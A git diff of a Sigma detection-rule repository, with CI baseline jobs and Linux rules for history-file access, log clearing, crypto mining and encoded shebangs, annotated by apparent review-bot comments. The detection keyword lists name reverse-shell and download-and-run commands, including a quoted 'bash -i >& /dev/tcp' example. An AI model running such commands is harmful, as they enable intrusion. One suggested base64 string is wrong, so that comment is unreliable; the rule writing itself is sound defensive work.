diff --git a/.github/workflows/known-FPs.csv b/.github/workflows/known-FPs.csv
index e29877a27..5b36cab65 100644
--- a/.github/workflows/known-FPs.csv
+++ b/.github/workflows/known-FPs.csv
@@ -5,17 +5,18 @@ db809f10-56ce-4420-8c86-d6a7d793c79c;Raw Disk Access Using Illegitimate Tools;py db809f10-56ce-4420-8c86-d6a7d793c79c;Raw Disk Access Using Illegitimate Tools;target\.exe 96f697b0-b499-4e5d-9908-a67bec11cdb6;Removal of Potential COM Hijacking Registry Keys;sharepointclient 96f697b0-b499-4e5d-9908-a67bec11cdb6;Removal of Potential COM Hijacking Registry Keys;odopen +1277f594-a7d1-4f28-a2d3-73af5cbeab43;Windows Shell File Write to Suspicious Folder;Computer: Agamemnon e28a5a99-da44-436d-b7a0-2afc20a5f413;Whoami Execution;WindowsPowerShell 8ac03a65-6c84-4116-acad-dc1558ff7a77;Sysmon Configuration Change;sysmon-intense\.xml -8ac03a65-6c84-4116-acad-dc1558ff7a77;Sysmon Configuration Change;Computer: evtx-PC +8ac03a65-6c84-4116-acad-dc1558ff7a77;Sysmon Configuration Change;Computer: (evtx-PC|Agamemnon) 4358e5a5-7542-4dcb-b9f3-87667371839b;ISO or Image Mount Indicator in Recent Files;_Office_Professional_Plus_ 36480ae1-a1cb-4eaa-a0d6-29801d7e9142;Renamed Binary;WinRAR 73bba97f-a82d-42ce-b315-9182e76c57b1;Imports Registry Key From a File;Evernote 6741916F-B4FA-45A0-8BF8-8249C702033A;Added Rule in Windows Firewall with Advanced Security;\\Integration\\Integrator\.exe 00bb5bd5-1379-4fcf-a965-a5b6f7478064;Setting Change in Windows Firewall with Advanced Security;Level: 4 Task: 0 -162ab1e4-6874-4564-853c-53ec3ab8be01;TeamViewer Remote Session;TeamViewer_Service\.exe -cdc8da7d-c303-42f8-b08c-b4ab47230263;Rundll32 Internet Connection;20.49.150.241 -bef0bc5a-b9ae-425d-85c6-7b2d705980c6;Python Initiated Connection;151.101.64.223 +162ab1e4-6874-4564-853c-53ec3ab8be01;TeamViewer Remote Session;TeamViewer(_Service)?\.exe +cdc8da7d-c303-42f8-b08c-b4ab47230263;Rundll32 Internet Connection;20\.49\.150\.241 +bef0bc5a-b9ae-425d-85c6-7b2d705980c6;Python Initiated Connection;151\.101\.64\.223 9711de76-5d4f-4c50-a94f-21e4e8f8384d;Installation of TeamViewer Desktop;TeamViewer_Desktop\.exe 96f697b0-b499-4e5d-9908-a67bec11cdb6;Removal of Potential COM Hijacking Registry 
Keys;target\.exe 9494479d-d994-40bf-a8b1-eea890237021;Suspicious Add Scheduled Task Parent;TeamViewer_\.exe @@ -29,6 +30,7 @@ cfeed607-6aa4-4bbd-9627-b637deb723c8;New or Renamed User Account with '$' in Att 7b449a5e-1db5-4dd0-a2dc-4e3a67282538;Hidden Local User Creation;HomeGroupUser\$ 1f2b5353-573f-4880-8e33-7d04dcf97744;Sysmon Configuration Modification;Computer: evtx-PC 734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8;Remote PowerShell Session Host Process (WinRM);WIN-FPV0DSIC9O6 +734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8;Remote PowerShell Session Host Process (WinRM);Computer: Agamemnon a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;Ninite\.exe 349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;Ninite\.exe a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;target\.exe @@ -36,3 +38,4 @@ a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;target\.exe a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;unzip\.exe 349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;TeamViewer_\.exe 7a02e22e-b885-4404-b38b-1ddc7e65258a;Suspicious Schtasks Schedule Type;TeamViewer_\.exe +949f1ffb-6e85-4f00-ae1e-c3c5b190d605;Explorer Process Tree Break;Computer: Agamemnon diff --git a/.github/workflows/sigma-test.yml b/.github/workflows/sigma-test.yml index f40ccf5ea..5cf624347 100644 --- a/.github/workflows/sigma-test.yml +++ b/.github/workflows/sigma-test.yml @@ -13,7 +13,7 @@ on: # yamllint disable-line rule:truthy - oscd env: - EVTX_BASELINE_VERSION: v0.6 + EVTX_BASELINE_VERSION: v0.7 jobs: test-sigma: 
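Review bot: The new `Computer: Agamemnon` entries for "Windows Shell File Write to Suspicious Folder", "Sysmon Configuration Change", "Remote PowerShell Session Host Process (WinRM)" and "Explorer Process Tree Break" suppress every finding of those rules on the whole baseline host rather than the artifact that fired, so a later regression in any of those four rules would be silently masked on that image. The surrounding entries key on the artifact instead (`sysmon-intense\.xml`, `TeamViewer(_Service)?\.exe`), and the third column is evidently a regex (`(evtx-PC|Agamemnon)`), so if the Azure image yields a distinctive path, process or event detail, prefer that as the suppression key and leave a comment-free but narrower pattern. Escaping the dots in the IP entries (`20\.49\.150\.241`) is the right correction, since the unescaped form matched any character in those positions.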
@@ -132,3 +132,21 @@ jobs: ./evtx-sigma-checker --log-source tools/config/thor.yml --evtx-path Win2022-AD/ --rule-path rules/windows/ > findings.json - name: Show findings excluding known FPs run: ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv + check-baseline-win2022-0-20348-azure: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - name: Download evtx-sigma-checker + run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker + - name: Download and extract Windows 2022.0.20348 Azure baseline + run: | + wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win2022-0-20348-azure.tgz + tar xzf win2022-0-20348-azure.tgz + - name: Remove deprecated rules + run: 'grep -ERl "^status: deprecated" rules | xargs -r rm -v' + - name: Check for Sigma matches in baseline + run: | + chmod +x evtx-sigma-checker + ./evtx-sigma-checker --log-source tools/config/thor.yml --evtx-path win2022-0-20348-azure/ --rule-path rules/windows/ > findings.json + - name: Show findings excluding known FPs + run: ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv diff --git a/rules/cloud/m365/microsoft365_pst_export_alert.yml b/rules/cloud/m365/microsoft365_pst_export_alert.yml new file mode 100644 index 000000000..a9950ae28 --- /dev/null +++ b/rules/cloud/m365/microsoft365_pst_export_alert.yml 
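Review bot: The new job fetches `evtx-sigma-checker` and the baseline tarball with plain `wget` and then runs the binary after `chmod +x` with no integrity check; `$EVTX_BASELINE_VERSION` is a release tag, which is mutable, so a re-tagged or compromised release would execute arbitrary code in CI with the repository checked out. Pin the expected digests beside the version in `env` and verify before executing, e.g. `echo "<sha256>  evtx-sigma-checker" | sha256sum -c -` and the same for `win2022-0-20348-azure.tgz`. The three earlier jobs follow the identical pattern, and this job is a near-verbatim copy of them, so a `strategy.matrix` over the baseline name would let the checksum step live in one place instead of being copied a fourth time; `actions/checkout@v2` is likewise a floating tag that could be pinned to a commit SHA.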
@@ -0,0 +1,23 @@ +title: PST Export Alert +id: 18b88d08-d73e-4f21-bc25-4b9892a4fdd0 +status: experimental +description: Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content +author: 'Sorina Ionescu' +date: 2022/02/08 +references: + - https://attack.mitre.org/techniques/T1114/ +logsource: + service: threat_management + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'eDiscovery search started or exported' + status: success + condition: selection +falsepositives: + - PST export can be done for legitimate purposes but due to the sensitive nature of its content it must be monitored. +level: medium +tags: + - attack.collection + - attack.t1114 diff --git a/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml b/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml index 70a8dec73..c49ea64da 100644 --- a/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml +++ b/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml @@ -5,21 +5,21 @@ author: 'Pawel Mazur' status: experimental date: 2021/11/18 references: - - https://attack.mitre.org/tactics/TA0010/ - - https://linux.die.net/man/1/wget - - https://gtfobins.github.io/gtfobins/wget/ + - https://attack.mitre.org/tactics/TA0010/ + - https://linux.die.net/man/1/wget + - https://gtfobins.github.io/gtfobins/wget/ logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: EXECVE - a0: wget - a1|startswith: '--post-file=' - condition: selection + selection: + type: EXECVE + a0: wget + a1|startswith: '--post-file=' + condition: selection tags: - - attack.exfiltration - - attack.t1048.003 + - attack.exfiltration + - attack.t1048.003 falsepositives: - - Legitimate usage of wget utility to post a file -level: medium \ No newline at end of file + - Legitimate usage of wget utility to post a file +level: medium 
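Review bot: The selection keys on the alert name `eDiscovery search started or exported` from `SecurityComplianceCenter`, which presumably means the rule only produces a hit when that built-in alert policy is enabled in the tenant and yields nothing when it is off — the description should state that prerequisite, e.g. `Requires the built-in 'eDiscovery search started or exported' alert policy to be enabled in the compliance portal`. The title "PST Export Alert" is narrower than what the detection matches, since per the description a plain eDiscovery search also fires it; a title such as `eDiscovery Search Or Export Alert` would describe the selection accurately. The `references` list only the ATT&CK page; a link to the alert policy documentation would help whoever has to tune this.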
diff --git a/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml b/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml index 2515f99b4..7e50f7619 100644 --- a/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml +++ b/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml @@ -4,33 +4,33 @@ status: test description: 'Detects commandline operations on shell history files' author: 'Mikhail Larin, oscd.community' references: - - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md date: 2020/10/17 modified: 2021/11/27 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - execve: - type: EXECVE - history: - - '.bash_history' - - '.zsh_history' - - '.zhistory' - - '.history' - - '.sh_history' - - 'fish_history' - condition: execve and history + execve: + type: EXECVE + history: + - '.bash_history' + - '.zsh_history' + - '.zhistory' + - '.history' + - '.sh_history' + - 'fish_history' + condition: execve and history fields: - - a0 - - a1 - - a2 - - a3 - - key + - a0 + - a1 + - a2 + - a3 + - key falsepositives: - - Legitimate administrative activity - - Legitimate software, cleaning hist file + - Legitimate administrative activity + - Legitimate software, cleaning hist file level: medium tags: - - attack.credential_access - - attack.t1552.003 + - attack.credential_access + - attack.t1552.003 diff --git a/rules/linux/builtin/lnx_shell_susp_commands.yml b/rules/linux/builtin/lnx_shell_susp_commands.yml index 44a5331c4..e31d748e5 100644 --- a/rules/linux/builtin/lnx_shell_susp_commands.yml +++ b/rules/linux/builtin/lnx_shell_susp_commands.yml 
@@ -4,56 +4,56 @@ status: test description: Detects suspicious shell commands used in various exploit codes (see references) author: Florian Roth references: - - http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html - - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb - - http://pastebin.com/FtygZ1cg - - https://artkond.com/2017/03/23/pivoting-guide/ + - http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html + - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb + - http://pastebin.com/FtygZ1cg + - https://artkond.com/2017/03/23/pivoting-guide/ date: 2017/08/21 modified: 2021/11/27 logsource: - product: linux + product: linux detection: - keywords: + keywords: # Generic suspicious commands - - 'wget * - http* | perl' - - 'wget * - http* | sh' - - 'wget * - http* | bash' - - 'python -m SimpleHTTPServer' - - '-m http.server' # Python 3 - - 'import pty; pty.spawn*' - - 'socat exec:*' - - 'socat -O /tmp/*' - - 'socat tcp-connect*' - - '*echo binary >>*' + - 'wget * - http* | perl' + - 'wget * - http* | sh' + - 'wget * - http* | bash' + - 'python -m SimpleHTTPServer' + - '-m http.server' # Python 3 + - 'import pty; pty.spawn*' + - 'socat exec:*' + - 'socat -O /tmp/*' + - 'socat tcp-connect*' + - '*echo binary >>*' # Malware - - '*wget *; chmod +x*' - - '*wget *; chmod 777 *' - - '*cd /tmp || cd /var/run || cd /mnt*' + - '*wget *; chmod +x*' + - '*wget *; chmod 777 *' + - '*cd /tmp || cd /var/run || cd /mnt*' # Apache Struts in-the-wild exploit codes - - '*stop;service iptables stop;*' - - '*stop;SuSEfirewall2 stop;*' - - 'chmod 777 2020*' - - '*>>/etc/rc.local' + - '*stop;service iptables stop;*' + - '*stop;SuSEfirewall2 stop;*' + - 'chmod 777 2020*' + - '*>>/etc/rc.local' # 
Metasploit framework exploit codes - - '*base64 -d /tmp/*' - - '* | base64 -d *' - - '*/chmod u+s *' - - '*chmod +s /tmp/*' - - '*chmod u+s /tmp/*' - - '* /tmp/haxhax*' - - '* /tmp/ns_sploit*' - - 'nc -l -p *' - - 'cp /bin/ksh *' - - 'cp /bin/sh *' - - '* /tmp/*.b64 *' - - '*/tmp/ysocereal.jar*' - - '*/tmp/x *' - - '*; chmod +x /tmp/*' - - '*;chmod +x /tmp/*' - condition: keywords + - '*base64 -d /tmp/*' + - '* | base64 -d *' + - '*/chmod u+s *' + - '*chmod +s /tmp/*' + - '*chmod u+s /tmp/*' + - '* /tmp/haxhax*' + - '* /tmp/ns_sploit*' + - 'nc -l -p *' + - 'cp /bin/ksh *' + - 'cp /bin/sh *' + - '* /tmp/*.b64 *' + - '*/tmp/ysocereal.jar*' + - '*/tmp/x *' + - '*; chmod +x /tmp/*' + - '*;chmod +x /tmp/*' + condition: keywords falsepositives: - - Unknown + - Unknown level: high tags: - - attack.execution - - attack.t1059.004 + - attack.execution + - attack.t1059.004 diff --git a/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml b/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml index 611227011..6b542f330 100644 --- a/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml +++ b/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml 
@@ -3,21 +3,20 @@ id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871 status: experimental description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1') references: - - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md + - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md date: 2021/10/16 author: Florian Roth logsource: - product: linux - category: network_connection + product: linux + category: network_connection detection: - selection: - Image|endswith: '/bin/bash' - filter: - DestinationIp: - - '127.0.0.1' - - '0.0.0.0' - condition: selection and not filter + selection: + Image|endswith: '/bin/bash' + filter: + DestinationIp: + - '127.0.0.1' + - '0.0.0.0' + condition: selection and not filter falsepositives: - - Unknown + - Unknown level: critical - diff --git a/rules/linux/process_creation/proc_creation_lnx_at_command.yml b/rules/linux/process_creation/proc_creation_lnx_at_command.yml index 18c74f982..f3fd95576 100644 --- a/rules/linux/process_creation/proc_creation_lnx_at_command.yml +++ b/rules/linux/process_creation/proc_creation_lnx_at_command.yml @@ -13,8 +13,8 @@ logsource: detection: selection: Image|endswith: - - '/at' - - '/atd' + - '/at' + - '/atd' condition: selection falsepositives: - Legitimate administration activities diff --git a/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml b/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml index acbfecabe..21ed3909f 100644 --- a/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml +++ b/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml 
@@ -4,20 +4,20 @@ status: test description: Detects usage of base64 utility to decode arbitrary base64-encoded text author: Daniil Yugoslavskiy, oscd.community references: - - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md date: 2020/10/19 modified: 2021/11/27 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/base64' - CommandLine|contains: '-d' - condition: selection + selection: + Image|endswith: '/base64' + CommandLine|contains: '-d' + condition: selection falsepositives: - - Legitimate activities + - Legitimate activities level: low tags: - - attack.defense_evasion - - attack.t1027 + - attack.defense_evasion + - attack.t1027 diff --git a/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml b/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml new file mode 100644 index 000000000..a58e96eb9 --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml 
@@ -0,0 +1,27 @@ +title: Linux Base64 Encoded Shebang In CLI +id: fe2f9663-41cb-47e2-b954-8a228f3b9dff +status: experimental +description: Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded +author: Nasreddine Bencherchali +date: 2022/09/15 +references: + - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html + - https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS +logsource: + product: linux + category: process_creation +detection: + selection: + CommandLine|contains: + - "IyEvYmluL2Jhc2" #!/bin/bash" + - "IyEvYmluL2Rhc2" #!/bin/dash" + - "IyEvYmluL3pza" #!/bin/zsh" + - "IyEvYmluL2Zpc2" #!/bin/fish + - "IyEvYmluL3No" # !/bin/sh" + condition: selection +falsepositives: + - Legitimate administration activities +level: medium +tags: + - attack.defense_evasion + - attack.t1140 diff --git a/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml b/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml index a0c4b717f..42cdad2b6 100644 --- a/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml +++ b/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml 
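Review bot: The five `CommandLine|contains` strings are the base64 encodings of the shebangs at byte alignment 0 only; if one or two bytes precede the shebang in the encoded payload (a leading newline, a space, a brace), the whole encoding shifts and none of these strings match, so the rule is trivially bypassed. `proc_creation_lnx_crypto_mining.yml` in this same commit lists all three alignments for `--donate-level=` and `stratum+tcp://`; doing the same here with the shared prefix `#!/bin/` gives `IyEvYmluL`, `MhL2Jpbi` and `jISJ9iaW4v` (alignments 0/1/2), which also covers the five listed shells and any other `/bin/` interpreter — please confirm the strings with `base64` before merging. The trailing comments (`#!/bin/bash"`) have an unbalanced quote and would read better as `# "#!/bin/bash"`.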
@@ -4,20 +4,20 @@ status: experimental description: Detects the usage of the unsafe bpftrace option author: Andreas Hunkeler (@Karneades) tags: - - attack.execution - - attack.t1059.004 + - attack.execution + - attack.t1059.004 references: - - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/ - - https://bpftrace.org/ + - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/ + - https://bpftrace.org/ date: 2022/02/11 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection1: - Image|endswith: 'bpftrace' - CommandLine|contains: '--unsafe' - condition: selection1 + selection: + Image|endswith: 'bpftrace' + CommandLine|contains: '--unsafe' + condition: selection falsepositives: - - Legitimate usage of the unsafe option + - Legitimate usage of the unsafe option level: medium diff --git a/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml b/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml index e9c822de9..2f7690be4 100644 --- a/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml +++ b/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml 
@@ -4,21 +4,25 @@ status: test description: Detects the execution of a cat /etc/sudoers to list all users that have sudo rights author: Florian Roth references: - - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/sleventyeleven/linuxprivchecker/ date: 2022/06/20 +modified: 2022/09/15 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: - - '/cat' - - 'grep' - CommandLine|contains: ' /etc/sudoers' - condition: selection + selection: + Image|endswith: + - '/cat' + - 'grep' + - '/head' + - '/tail' + - '/more' + CommandLine|contains: ' /etc/sudoers' + condition: selection falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: medium tags: - - attack.reconnaissance - - attack.t1592.004 + - attack.reconnaissance + - attack.t1592.004 diff --git a/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml b/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml new file mode 100644 index 000000000..2513bcf86 --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml 
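Review bot: The extended `Image|endswith` list mixes `'grep'` with `'/cat'`, `'/head'`, `'/tail'` and `'/more'`; without the leading slash `'grep'` also matches `egrep`, `fgrep`, `zgrep` and `pgrep`, which may be intended but is inconsistent with the other entries and with the explicit `/grep`/`/egrep` pair this commit adds to `proc_creation_lnx_security_software_discovery.yml` — either add the slash or leave a comment such as `# no leading slash on purpose: covers egrep/fgrep/zgrep`. `less` is at least as common as `more` for viewing `/etc/sudoers`, so `- '/less'` belongs in this list, and in the `local_account` and `local_groups` lists this commit extends the same way.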
@@ -0,0 +1,25 @@ +title: Remove Immutable File Attribute +id: 34979410-e4b5-4e5d-8cfb-389fdff05c12 +related: + - id: a5b977d6-8a81-4475-91b9-49dbfcd941f7 + type: derived +status: experimental +description: Detects usage of the 'chattr' utility to remove immutable file attribute. +author: Nasreddine Bencherchali +references: + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +date: 2022/09/15 +logsource: + product: linux + category: process_creation +detection: + selection: + Image|endswith: '/chattr' + CommandLine|contains: ' -i ' + condition: selection +falsepositives: + - Administrator interacting with immutable files (e.g. for instance backups). +level: medium +tags: + - attack.defense_evasion + - attack.t1222.002 diff --git a/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml b/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml index a3252ac28..115b209a0 100644 --- a/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml +++ b/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml @@ -4,7 +4,7 @@ status: stable description: Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion author: Ömer Günal, oscd.community date: 2020/10/07 -modified: 2022/07/07 +modified: 2022/09/15 references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md logsource: @@ -15,6 +15,7 @@ detection: Image|endswith: - '/rm' # covers /rmdir as well - '/shred' + - '/unlink' CommandLine|contains: - '/var/log' - '/var/spool/mail' diff --git a/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml b/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml index 03cace922..42f0e639b 100644 --- a/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml +++ b/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml 
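Review bot: `CommandLine|contains: ' -i '` requires a space after `-i`, so combined attribute flags such as `chattr -ia file` or `chattr -iR dir` are missed, and combining flags is the common way chattr is invoked. `' -i'` without the trailing space, or `CommandLine|re: ' -[a-zA-Z]*i'` to cover combined flags, catches those at the cost of a little extra noise. The `related` entry points at `a5b977d6-8a81-4475-91b9-49dbfcd941f7`, which is not in this commit; a short comment naming that rule would save readers a lookup.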
@@ -3,7 +3,7 @@ id: 3fcc9b35-39e4-44c0-a2ad-9e82b6902b31 status: experimental description: Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks date: 2021/10/15 -modified: 2022/07/07 +modified: 2022/09/15 author: Max Altgelt, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC tags: - attack.defense_evasion @@ -20,6 +20,10 @@ detection: - 'rm -r /var/log/syslog' - 'rm -f /var/log/syslog' - 'rm -rf /var/log/syslog' + - 'unlink /var/log/syslog' + - 'unlink -r /var/log/syslog' + - 'unlink -f /var/log/syslog' + - 'unlink -rf /var/log/syslog' - 'mv /var/log/syslog' - ' >/var/log/syslog' - ' > /var/log/syslog' diff --git a/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml b/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml index 8295856a4..c9c7a3f80 100644 --- a/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml +++ b/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml @@ -3,7 +3,7 @@ id: ec127035-a636-4b9a-8555-0efd4e59f316 status: experimental description: Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. date: 2021/10/15 -modified: 2022/07/07 +modified: 2022/09/15 author: Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC tags: - attack.collection 
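Review bot: Three of the four added keywords describe invocations that cannot succeed: as far as I know neither GNU coreutils nor BusyBox `unlink` accepts `-r`, `-f` or `-rf` — it takes exactly one operand — so `unlink -r /var/log/syslog` and the two variants fail with a usage error and would not remove anything. Keep only `- 'unlink /var/log/syslog'` and drop the three option forms; the `/unlink` additions to the `Image|endswith` lists in `proc_creation_lnx_clear_logs.yml` and `proc_creation_lnx_file_deletion.yml` are unaffected because those rules match on the path, not on options.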
@@ -14,19 +14,13 @@ logsource: product: linux category: process_creation detection: - selection1: + selection: Image|contains: 'xclip' - selection2: - CommandLine|contains: - - '-selection' + CommandLine|contains|all: - '-sel' - selection3: - CommandLine|contains: - - 'clipboard' - 'clip' - selection4: - CommandLine|contains: '-o' - condition: all of selection* + - '-o' + condition: selection falsepositives: - Legitimate usage of xclip tools. level: low diff --git a/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml b/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml new file mode 100644 index 000000000..454af266f --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml @@ -0,0 +1,21 @@ +title: Remove Scheduled Cron Task/Job +id: c2e234de-03a3-41e1-b39a-1e56dc17ba67 +status: experimental +description: Detects usage of the 'crontab' utility to remove the current crontab. This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible +author: Nasreddine Bencherchali +references: + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +date: 2022/09/15 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: 'crontab' + CommandLine|contains: ' -r' + condition: selection +falsepositives: + - Unknown +level: medium +tags: + - attack.defense_evasion diff --git a/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml b/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml index cc4e2eb28..4a66f1c96 100644 --- a/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml +++ b/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml 
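Review bot: `Image|endswith: 'crontab'` lacks the leading slash that the other rules added in this commit use (`'/chattr'`, `'/curl'`), so it also matches any binary whose name merely ends in `crontab`; that does pick up `fcrontab`, which supports `-r` as well, so if the wider match is intended a comment like `# no leading slash: also matches fcrontab` avoids a later "fix". The `tags` list carries only the tactic `attack.defense_evasion` with no technique, unlike its siblings here (`attack.t1222.002`, `attack.t1140`, `attack.t1105`); `attack.t1070` (indicator removal) is the closest fit for wiping another actor's crontab as the description frames it. `falsepositives: Unknown` could at least mention configuration-management or uninstall scripts that run `crontab -r`.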
@@ -3,36 +3,36 @@ id: 9069ea3c-b213-4c52-be13-86506a227ab1 status: experimental description: Detects command line parameters or strings often used by crypto miners references: - - https://www.poolwatch.io/coin/monero + - https://www.poolwatch.io/coin/monero date: 2021/10/26 author: Florian Roth logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection: - CommandLine|contains: - - ' --cpu-priority=' - - '--donate-level=0' - - ' -o pool.' - - ' --nicehash' - - ' --algo=rx/0 ' - - 'stratum+tcp://' - - 'stratum+udp://' - # Sub process started by xmrig - the most popular Monero crypto miner - unknown if this causes any false positives - - 'sh -c /sbin/modprobe msr allow_writes=on' - # base64 encoded: --donate-level= - - 'LS1kb25hdGUtbGV2ZWw9' - - '0tZG9uYXRlLWxldmVsP' - - 'tLWRvbmF0ZS1sZXZlbD' - # base64 encoded: stratum+tcp:// and stratum+udp:// - - 'c3RyYXR1bSt0Y3A6Ly' - - 'N0cmF0dW0rdGNwOi8v' - - 'zdHJhdHVtK3RjcDovL' - - 'c3RyYXR1bSt1ZHA6Ly' - - 'N0cmF0dW0rdWRwOi8v' - - 'zdHJhdHVtK3VkcDovL' - condition: selection + selection: + CommandLine|contains: + - ' --cpu-priority=' + - '--donate-level=0' + - ' -o pool.' + - ' --nicehash' + - ' --algo=rx/0 ' + - 'stratum+tcp://' + - 'stratum+udp://' + # Sub process started by xmrig - the most popular Monero crypto miner - unknown if this causes any false positives + - 'sh -c /sbin/modprobe msr allow_writes=on' + # base64 encoded: --donate-level= + - 'LS1kb25hdGUtbGV2ZWw9' + - '0tZG9uYXRlLWxldmVsP' + - 'tLWRvbmF0ZS1sZXZlbD' + # base64 encoded: stratum+tcp:// and stratum+udp:// + - 'c3RyYXR1bSt0Y3A6Ly' + - 'N0cmF0dW0rdGNwOi8v' + - 